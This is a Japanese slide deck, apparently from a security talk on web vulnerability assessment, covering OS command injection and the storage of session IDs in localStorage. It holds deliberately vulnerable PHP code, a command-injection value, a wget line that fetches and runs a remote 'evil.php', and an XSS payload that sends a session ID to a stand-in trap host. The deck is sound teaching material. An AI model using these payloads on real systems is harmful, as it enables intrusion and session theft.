Download to read offline
![問題(どのような脆弱性があるでしょうか?)
http://hoge.com/order/summary
<?php // 受注情報の集計バッチを動かす
require 'common.php';
// 未ログインはログインページへリダイレクトする
if(!is_login()) header("Location: http://hoge.com/login"); exit();
$yyyymm = $_POST["yyyymm"]; // 201701
// バックグラウンドでPHPファイルを動かす
system("php /batch/order_summary.php $yyyymm &");](https://image.slidesharecdn.com/random-170220021639/85/SmartTechGeeks-2-9-320.jpg)
![問題(どのような脆弱性があるでしょうか?)
http://hoge.com/order/summary
<?php // 受注情報の集計バッチを動かす
require 'common.php';
// 未ログインはログインページへリダイレクトする
if(!is_login()) header("Location: http://hoge.com/login"); exit();
$yyyymm = $_POST["yyyymm"]; // 201701;sleep 10;
// バックグラウンドでPHPファイルを動かす
system("php /batch/order_summary.php $yyyymm &");](https://image.slidesharecdn.com/random-170220021639/85/SmartTechGeeks-2-10-320.jpg)
![問題(どのような脆弱性があるでしょうか?)
http://hoge.com/order/summary
<?php // 受注情報の集計バッチを動かす
require 'common.php';
// 未ログインはログインページへリダイレクトする
if(!is_login()) header("Location: http://hoge.com/login"); exit();
$yyyymm = $_POST["yyyymm"]; // 201701;sleep 10;
// バックグラウンドでPHPファイルを動かす
system("php /batch/order_summary.php $yyyymm &");](https://image.slidesharecdn.com/random-170220021639/85/SmartTechGeeks-2-11-320.jpg)
![OSコマンドインジェクション
http://hoge.com/order/summary
<?php // 受注情報の集計バッチを動かす
require 'common.php';
// 未ログインはログインページへリダイレクトする
if(!is_login()) header(“Location: http://hoge.com/login"); exit();
$yyyymm = $_POST[“yyyymm"]; // 201701;sleep 10;
// バックグラウンドでPHPファイルを動かす
system("php /batch/order_summary.php $yyyymm &");
①バッチを動かす
php /batch/order_summary.php 201701;
②sleepコマンドで10秒停止
sleep 10;](https://image.slidesharecdn.com/random-170220021639/85/SmartTechGeeks-2-12-320.jpg)
![WebStorageへの機密情報の保存
セッション情報が送信されたサイトのアクセスログ
192.168.99.1 - - [08/Feb/2017:06:06:04 +0000] "GET/1.png?session_id=s1234
HTTP/1.1" 404 497 "http://192.168.99.100/xss.php" "Mozilla/5.0 (Windows NT 6.1;
Win64;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
Safari/537.36"
GET/1.png?session_id=s1234 HTTP/1.1
アクセスログに残っている "s1234" を使うことで
対象サイトでなりすましできる](https://image.slidesharecdn.com/random-170220021639/85/SmartTechGeeks-2-21-320.jpg)
More Related Content
ソースで学ぶ脆弱性診断 - SmartTechGeeks #2
- 1.
- 2. 名前 桃原 裕太/ とうばる ゆうた 所属 株式会社 シーエー・アドバンス 技術統括本部 経歴 前職 ・ECサイト等の開発 株式会社 シーエー・アドバンス ・社内ツールの開発 ・脆弱性診断の業務に携わって約4年 業務 Webアプリケーション脆弱性診断 ・PCブラウザ向けアプリ ・SPブラウザ向けアプリ ・Androidアプリ ・iOSアプリ 自己紹介
- 3.
- 4.
- 5.
- 6.
- 7. 最近だと… WordPress の脆弱性がありましたね 【参考URL】https://www.ipa.go.jp/security/ciadr/vul/20170206-wordpress.html 対 象 WordPress4.7.0 から WordPress 4.7.1 影 響 REST API の脆弱性を悪用することで コンテンツが改ざんされる 対 策 WordPress 4.7.2 へアップデートする
- 8.
- 9. 問題(どのような脆弱性があるでしょうか?) http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header("Location: http://hoge.com/login"); exit(); $yyyymm = $_POST["yyyymm"]; // 201701 // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &");
- 10. 問題(どのような脆弱性があるでしょうか?) http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header("Location: http://hoge.com/login"); exit(); $yyyymm = $_POST["yyyymm"]; // 201701;sleep 10; // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &");
- 11. 問題(どのような脆弱性があるでしょうか?) http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header("Location: http://hoge.com/login"); exit(); $yyyymm = $_POST["yyyymm"]; // 201701;sleep 10; // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &");
- 12. OSコマンドインジェクション http://hoge.com/order/summary <?php // 受注情報の集計バッチを動かす require'common.php'; // 未ログインはログインページへリダイレクトする if(!is_login()) header(“Location: http://hoge.com/login"); exit(); $yyyymm = $_POST[“yyyymm"]; // 201701;sleep 10; // バックグラウンドでPHPファイルを動かす system("php /batch/order_summary.php $yyyymm &"); ①バッチを動かす php /batch/order_summary.php 201701; ②sleepコマンドで10秒停止 sleep 10;
- 13. OSコマンドインジェクション なぜsleepコマンド? ❏ yyyymm=201701 の場合 ※レスポンスが返ってくるまでに1秒かかる ❏yyyymm=201701;sleep 10; の場合 ※レスポンスが返ってくるまでに11秒かかる
- 14.
- 15. OSコマンドインジェクション 影響 ❏ 不正なファイルのDLと実行 ❏ ;wgethttp://example.com/evil.txt -O evil.php;php evil.php; ❏ ツールの取得(yum, apt-get) ❏ ファイル削除 (rm) ❏ OSシャットダウン(shutdown) ❏ その他いろいろ
- 16.
- 17.
- 18. 問題(どのような脆弱性があるでしょうか?) http://hoge.com/login.php <!-- javascript --> //ログイン処理 fetch('/login_fetch.php', { method: 'POST', body: new FormData(document.getElementById('form1')), }) // レスポンス取得 .then(response => response.json()) // WebストレージにセッションIDを格納 .then(json => localStorage.setItem('session_id', (json.isLogin) ? json.session_id : ''));
- 19. 問題(どのような脆弱性があるでしょうか?) http://hoge.com/login.php <!-- javascript --> //ログイン処理 fetch('/login_fetch.php', { method: 'POST', body: new FormData(document.getElementById('form1')), }) // レスポンス取得 .then(response => response.json()) // WebストレージにセッションIDを格納 .then(json => localStorage.setItem('session_id', (json.isLogin) ? json.session_id : '')); WebStorageにセッションIDを保存している
- 20. WebStorageへの機密情報の保存 セッションIDを盗まれてしまう可能性があります セッションIDが盗まれる例 ※サイト内にXSSがある場合になります… 1. XSSを利用して、下記scriptを埋め込みます。 2. 結果、罠サイトへアクセスする際にセッションIDが漏洩します。 <!--javascript --> ses_id = localStorage.getItem('session_id'); img = $('<img src="http://fuga.com/1.png?session_id='+ses_id+'">'); $('body').append(img); // bodyの一番下にimgタグ追加
- 21. WebStorageへの機密情報の保存 セッション情報が送信されたサイトのアクセスログ 192.168.99.1 - -[08/Feb/2017:06:06:04 +0000] "GET/1.png?session_id=s1234 HTTP/1.1" 404 497 "http://192.168.99.100/xss.php" "Mozilla/5.0 (Windows NT 6.1; Win64;x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" GET/1.png?session_id=s1234 HTTP/1.1 アクセスログに残っている "s1234" を使うことで 対象サイトでなりすましできる
- 22.
- 23.
- 24. 実際に脆弱性診断するときはどうしているか 診断ツールを使って確認しています。 ・自動診断(XSS, インジェクション攻撃 ...etc) ・手動診断(CSRF, アクセス権 ... etc) ツールで検出しやすいものは自動診断 それ以外項目は手動診断しています。
- 25. 脆弱性診断で使うツール 診断効率をあげるためのツールのご紹介 ❏ Burp Suite ※弊社でも使ってます ❏OWASP ZAP ❏ Fiddler ※試す場合は、許可を得たサイトだけにしてください。 他者のサービスで試すと不正アクセスで訴えられる恐れがあります。
- 26.
- 27.
- 28.
- 29. まとめ、と補足 ❏ Webアプリケーション脆弱性診断について 少しでも理解してもらえると幸いです。 ❏ OSコマンドインジェクションは危ない! ❏ふつうに開発してるだけだと脆弱性は入ってしまうので、ぜひ 対策をご検討ください。 ❏ セキュリティの専門家に依頼する ❏ 社内でセキュリティ意識を高める ... etc
- 30.